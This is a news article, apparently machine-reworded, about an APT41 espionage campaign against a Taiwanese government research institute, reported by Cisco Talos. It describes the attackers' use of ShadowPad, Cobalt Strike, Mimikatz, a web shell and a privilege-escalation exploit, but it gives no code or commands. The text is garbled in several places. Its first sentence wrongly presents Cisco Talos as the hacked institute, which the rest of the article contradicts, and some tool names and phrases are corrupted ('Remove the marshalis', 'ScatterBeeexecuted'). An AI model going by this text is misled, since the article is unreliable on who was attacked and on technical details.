Cisco Talos, a Taiwanese government research institute specializing in computing and related technologies, was hacked by China-linked national threat actors, according to new findings.
As early as mid-July 2023, an unnamed entity was targeted to provide various backdoors and post-compromise tools such as ShadowPad and Cobalt Strike. It is attributed with moderate confidence to a prolific hacking group tracked as APT41.
“The ShadowPad malware used in the current campaign used an outdated, vulnerable version of the Microsoft Office IME binary as a bootloader to download a customized second-stage bootloader to launch the payload,” security researchers Joey Chen, Ashley Shen, and Vitor Ventura said.
“The threat actor compromised three hosts in the target environment and was able to steal some documents from the network.”
Cisco Talos said it discovered the activity in August 2023 after discovering what it called “abnormal PowerShell commands” connecting to an IP address to download and execute PowerShell scripts in a compromised environment.
The exact initial access vector used in the attack is unknown, although it involved using a web shell to maintain persistent access and drop additional payloads such as ShadowPad and Cobalt Strike, the latter delivered via a Go-based Cobalt Strike loader called CS-Avoid-Killing.
“The Cobalt Strike malware was designed to use an anti-AV loader to bypass AV detection and avoid security product quarantine,” the researchers said.
Alternatively, the threat actor has been observed running PowerShell commands to run scripts responsible for executing ShadowPad into memory and receive the Cobalt Strike malware from the compromised control server (C2). A DLL-based ShadowPad loader, also called ScatterBeeexecuted via DLL sideloading.
Some of the other steps performed as part of the infiltration included using Mimikatz to extract passwords and running several commands to collect information about user accounts, directory structures, and network configuration.
“APT41 created a custom bootloader to introduce a proof of concept CVE-2018-0824 directly into memory, using a remote code execution vulnerability to achieve local privilege escalation,” Talos said, noting the latest payload, Remove the marshalis resolved after going through three different stages.
The cyber security service also paid attention to the adversary’s attempts to avoid detection by stopping its own activities when other users are detected on the system. “Once the backdoor is deployed, the attacker will remove the web shell and guest account that allowed the initial access,” the researchers said.
Disclosure occurs as Germany revealed Earlier this week, Chinese state actors were behind a 2021 cyber attack on the country’s national mapping agency, the Federal Bureau of Mapping and Geodesy (BKG), for espionage purposes.
The Chinese embassy in Berlin responded to these accusations said the accusation is baseless and calls on Germany to “stop the practice of using cyber security issues to defame China politically and in the media”.
